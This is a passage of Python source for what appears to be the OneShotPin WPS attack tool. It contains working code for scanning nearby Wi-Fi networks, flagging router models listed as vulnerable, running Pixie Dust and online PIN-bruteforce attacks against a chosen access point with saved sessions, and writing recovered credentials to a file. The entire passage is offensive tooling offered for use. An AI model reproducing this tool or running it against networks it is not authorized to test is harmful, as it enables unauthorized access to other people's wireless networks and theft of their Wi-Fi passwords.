if (not start_pin) or (len(start_pin) < 4):
# Trying to restore previous session
try:
filename = self.sessions_dir + '{}.run'.format(bssid.replace(':', '').upper())
with open(filename, 'r') as file:
if input('[?] Restore previous session for {}? [n/Y] '.format(bssid)).lower() != 'n':
mask = file.readline().strip()
else:
raise FileNotFoundError
except FileNotFoundError:
mask = '0000'
else:
mask = start_pin[:7]
try:
self.bruteforce = BruteforceStatus()
self.bruteforce.mask = mask
if len(mask) == 4:
f_half = self.__first_half_bruteforce(bssid, mask, delay)
if f_half and (self.connection_status.status != 'GOT_PSK'):
self.__second_half_bruteforce(bssid, f_half, '001', delay)
elif len(mask) == 7:
f_half = mask[:4]
s_half = mask[4:]
self.__second_half_bruteforce(bssid, f_half, s_half, delay)
raise KeyboardInterrupt
except KeyboardInterrupt:
print("\nAborting…")
filename = self.sessions_dir + '{}.run'.format(bssid.replace(':', '').upper())
with open(filename, 'w') as file:
file.write(self.bruteforce.mask)
print('[i] Session saved in {}'.format(filename))
if args.loop:
raise KeyboardInterrupt
def cleanup(self):
self.retsock.close()
self.wpas.terminate()
os.remove(self.res_socket_file)
shutil.rmtree(self.tempdir, ignore_errors=True)
os.remove(self.tempconf)
def __del__(self):
self.cleanup()
class WiFiScanner:
"""docstring for WiFiScanner"""
def __init__(self, interface, vuln_list=None):
self.interface = interface
self.vuln_list = vuln_list
reports_fname = os.path.dirname(os.path.realpath(__file__)) + '/reports/stored.csv'
try:
with open(reports_fname, 'r', newline='', encoding='utf-8', errors='replace') as file:
csvReader = csv.reader(file, delimiter=';', quoting=csv.QUOTE_ALL)
# Skip header
next(csvReader)
self.stored = []
for row in csvReader:
self.stored.append(
(
row[1], # BSSID
row[2] # ESSID
)
)
except FileNotFoundError:
self.stored = []
def iw_scanner(self) -> Dict[int, dict]:
"""Parsing iw scan results"""
def handle_network(line, result, networks):
networks.append(
{
'Security type': 'Unknown',
'WPS': False,
'WPS locked': False,
'Model': '',
'Model number': '',
'Device name': ''
}
)
networks[-1]['BSSID'] = result.group(1).upper()
def handle_essid(line, result, networks):
d = result.group(1)
networks[-1]['ESSID'] = codecs.decode(d, 'unicode-escape').encode('latin1').decode('utf-8', errors='replace')
def handle_level(line, result, networks):
networks[-1]['Level'] = int(float(result.group(1)))
def handle_securityType(line, result, networks):
sec = networks[-1]['Security type']
if result.group(1) == 'capability':
if 'Privacy' in result.group(2):
sec = 'WEP'
else:
sec = 'Open'
elif sec == 'WEP':
if result.group(1) == 'RSN':
sec = 'WPA2'
elif result.group(1) == 'WPA':
sec = 'WPA'
elif sec == 'WPA':
if result.group(1) == 'RSN':
sec = 'WPA/WPA2'
elif sec == 'WPA2':
if result.group(1) == 'WPA':
sec = 'WPA/WPA2'
networks[-1]['Security type'] = sec
def handle_wps(line, result, networks):
networks[-1]['WPS'] = result.group(1)
def handle_wpsLocked(line, result, networks):
flag = int(result.group(1), 16)
if flag:
networks[-1]['WPS locked'] = True
def handle_model(line, result, networks):
d = result.group(1)
networks[-1]['Model'] = codecs.decode(d, 'unicode-escape').encode('latin1').decode('utf-8', errors='replace')
def handle_modelNumber(line, result, networks):
d = result.group(1)
networks[-1]['Model number'] = codecs.decode(d, 'unicode-escape').encode('latin1').decode('utf-8', errors='replace')
def handle_deviceName(line, result, networks):
d = result.group(1)
networks[-1]['Device name'] = codecs.decode(d, 'unicode-escape').encode('latin1').decode('utf-8', errors='replace')
cmd = 'iw dev {} scan'.format(self.interface)
proc = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, encoding='utf-8', errors='replace')
lines = proc.stdout.splitlines()
networks = []
matchers = {
re.compile(r'BSS (\S+)( )?\(on \w+\)'): handle_network,
re.compile(r'SSID: (.*)'): handle_essid,
re.compile(r'signal: ([+-]?([0-9]*[.])?[0-9]+) dBm'): handle_level,
re.compile(r'(capability): (.+)'): handle_securityType,
re.compile(r'(RSN):\t [*] Version: (\d+)'): handle_securityType,
re.compile(r'(WPA):\t [*] Version: (\d+)'): handle_securityType,
re.compile(r'WPS:\t [*] Version: (([0-9]*[.])?[0-9]+)'): handle_wps,
re.compile(r' [*] AP setup locked: (0x[0-9]+)'): handle_wpsLocked,
re.compile(r' [*] Model: (.*)'): handle_model,
re.compile(r' [*] Model Number: (.*)'): handle_modelNumber,
re.compile(r' [*] Device name: (.*)'): handle_deviceName
}
for line in lines:
if line.startswith('command failed:'):
print('[!] Error:', line)
return False
line = line.strip('\t')
for regexp, handler in matchers.items():
res = re.match(regexp, line)
if res:
handler(line, res, networks)
# Filtering non-WPS networks
networks = list(filter(lambda x: bool(x['WPS']), networks))
if not networks:
return False
# Sorting by signal level
networks.sort(key=lambda x: x['Level'], reverse=True)
# Putting a list of networks in a dictionary, where each key is a network number in list of networks
network_list = {(i + 1): network for i, network in enumerate(networks)}
# Printing scanning results as table
def truncateStr(s, length, postfix=''):
"""
Truncate string with the specified length
@s input string
@length length of output string
"""
if len(s) > length:
k = length - len(postfix)
s = s[:k] + postfix
return s
def colored(text, color=None):
"""Returns colored text"""
if color:
if color == 'green':
text = '\033[92m{}\033[00m'.format(text)
elif color == 'red':
text = '\033[91m{}\033[00m'.format(text)
elif color == 'yellow':
text = '\033[93m{}\033[00m'.format(text)
else:
return text
else:
return text
return text
if self.vuln_list:
print('Network marks: {1} {0} {2} {0} {3}'.format(
'|',
colored('Possibly vulnerable', color='green'),
colored('WPS locked', color='red'),
colored('Already stored', color='yellow')
))
print('Networks list:')
print('{:<4} {:<18} {:<25} {:<8} {:<4} {:<27} {:<}'.format(
'#', 'BSSID', 'ESSID', 'Sec.', 'PWR', 'WSC device name', 'WSC model'))
network_list_items = list(network_list.items())
if args.reverse_scan:
network_list_items = network_list_items[::-1]
for n, network in network_list_items:
number = f'{n})'
model = '{} {}'.format(network['Model'], network['Model number'])
essid = truncateStr(network['ESSID'], 25)
deviceName = truncateStr(network['Device name'], 27)
line = '{:<4} {:<18} {:<25} {:<8} {:<4} {:<27} {:<}'.format(
number, network['BSSID'], essid,
network['Security type'], network['Level'],
deviceName, model
)
if (network['BSSID'], network['ESSID']) in self.stored:
print(colored(line, color='yellow'))
elif network['WPS locked']:
print(colored(line, color='red'))
elif self.vuln_list and (model in self.vuln_list):
print(colored(line, color='green'))
else:
print(line)
return network_list
def prompt_network(self) -> str:
networks = self.iw_scanner()
if not networks:
print('[-] No WPS networks found.')
return
while 1:
try:
networkNo = input('Select target (press Enter to refresh): ')
if networkNo.lower() in ('r', '0', ''):
return self.prompt_network()
elif int(networkNo) in networks.keys():
return networks[int(networkNo)]['BSSID']
else:
raise IndexError
except Exception:
print('Invalid number')
def ifaceUp(iface, down=False):
if down:
action = 'down'
else:
action = 'up'
cmd = 'ip link set {} {}'.format(iface, action)
res = subprocess.run(cmd, shell=True, stdout=sys.stdout, stderr=sys.stdout)
if res.returncode == 0:
return True
else:
return False
def die(msg):
sys.stderr.write(msg + '\n')
sys.exit(1)
def usage():
return """
OneShotPin 0.0.2 (c) 2017 rofl0r, modded by drygdryg
%(prog)s <arguments>
Required arguments:
-i, --interface=<wlan0> : Name of the interface to use
Optional arguments:
-b, --bssid=<mac> : BSSID of the target AP
-p, --pin=<wps pin> : Use the specified pin (arbitrary string or 4/8 digit pin)
-K, --pixie-dust : Run Pixie Dust attack
-B, --bruteforce : Run online bruteforce attack
--push-button-connect : Run WPS push button connection
Advanced arguments:
-d, --delay=<n> : Set the delay between pin attempts [0]
-w, --write : Write AP credentials to the file on success
-F, --pixie-force : Run Pixiewps with --force option (bruteforce full range)
-X, --show-pixie-cmd : Always print Pixiewps command
--vuln-list=<filename> : Use custom file with vulnerable devices list ['vulnwsc.txt']
--iface-down : Down network interface when the work is finished
-l, --loop : Run in a loop
-r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays
--mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
(for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
-v, --verbose : Verbose output
Example:
%(prog)s -i wlan0 -b 00:90:4C:C1:AC:21 -K
"""
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='OneShotPin 0.0.2 (c) 2017 rofl0r, modded by drygdryg',
epilog='Example: %(prog)s -i wlan0 -b 00:90:4C:C1:AC:21 -K'
)
parser.add_argument(
'-i', '--interface',
type=str,
required=True,
help='Name of the interface to use'
)
parser.add_argument(
'-b', '--bssid',
type=str,
help='BSSID of the target AP'
)
parser.add_argument(
'-p', '--pin',
type=str,
help='Use the specified pin (arbitrary string or 4/8 digit pin)'
)
parser.add_argument(
'-K', '--pixie-dust',
action='store_true',
help='Run Pixie Dust attack'
)
parser.add_argument(
'-F', '--pixie-force',
action='store_true',
help='Run Pixiewps with --force option (bruteforce full range)'
)
parser.add_argument(
'-X', '--show-pixie-cmd',
action='store_true',
help='Always print Pixiewps command'
)
parser.add_argument(
'-B', '--bruteforce',
action='store_true',
help='Run online bruteforce attack'
)
parser.add_argument(
'--pbc', '--push-button-connect',
action='store_true',
help='Run WPS push button connection'
)
parser.add_argument(
'-d', '--delay',
type=float,
help='Set the delay between pin attempts'
)
parser.add_argument(
'-w', '--write',
action='store_true',
help='Write credentials to the file on success'
)
parser.add_argument(
'--iface-down',
action='store_true',
help='Down network interface when the work is finished'
)
parser.add_argument(
'--vuln-list',
type=str,
default=os.path.dirname(os.path.realpath(__file__)) + '/vulnwsc.txt',
help='Use custom file with vulnerable devices list'
)
parser.add_argument(
'-l', '--loop',
action='store_true',
help='Run in a loop'
)
parser.add_argument(
'-r', '--reverse-scan',
action='store_true',
help='Reverse order of networks in the list of networks. Useful on small displays'
)
parser.add_argument(
'--mtk-wifi',
action='store_true',
help='Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit '
'(for internal Wi-Fi adapters implemented in MediaTek SoCs). '
'Turn off Wi-Fi in the system settings before using this.'
)
parser.add_argument(
'-v', '--verbose',
action='store_true',
help='Verbose output'
)
args = parser.parse_args()
if sys.hexversion < 0x03060F0:
die("The program requires Python 3.6 and above")
if os.getuid() != 0:
die("Run it as root")
if args.mtk_wifi:
wmtWifi_device = Path("/dev/wmtWifi")
if not wmtWifi_device.is_char_device():
die("Unable to activate MediaTek Wi-Fi interface device (--mtk-wifi): "
"/dev/wmtWifi does not exist or it is not a character device")
wmtWifi_device.chmod(0o644)
wmtWifi_device.write_text("1")
if not ifaceUp(args.interface):
die('Unable to up interface "{}"'.format(args.interface))
while True:
try:
companion = Companion(args.interface, args.write, print_debug=args.verbose)
if args.pbc:
companion.single_connection(pbc_mode=True)
else:
if not args.bssid:
try:
with open(args.vuln_list, 'r', encoding='utf-8') as file:
vuln_list = file.read().splitlines()
except FileNotFoundError:
vuln_list = []
scanner = WiFiScanner(args.interface, vuln_list)
if not args.loop:
print('[*] BSSID not specified (--bssid) — scanning for available networks')
args.bssid = scanner.prompt_network()
if args.bssid:
companion = Companion(args.interface, args.write, print_debug=args.verbose)
if args.bruteforce:
companion.smart_bruteforce(args.bssid, args.pin, args.delay)
else:
companion.single_connection(args.bssid, args.pin, args.pixie_dust,
args.show_pixie_cmd, args.pixie_force)
if not args.loop:
break
else:
args.bssid = None
except KeyboardInterrupt:
if args.loop:
if input("\n[?] Exit the script (otherwise continue to AP scan)? [N/y] ").lower() == 'y':
print("Aborting…")
break
else:
args.bssid = None
else:
print("\nAborting…")
break
if args.iface_down:
ifaceUp(args.interface, down=True)
if args.mtk_wifi:
wmtWifi_device.write_text("0")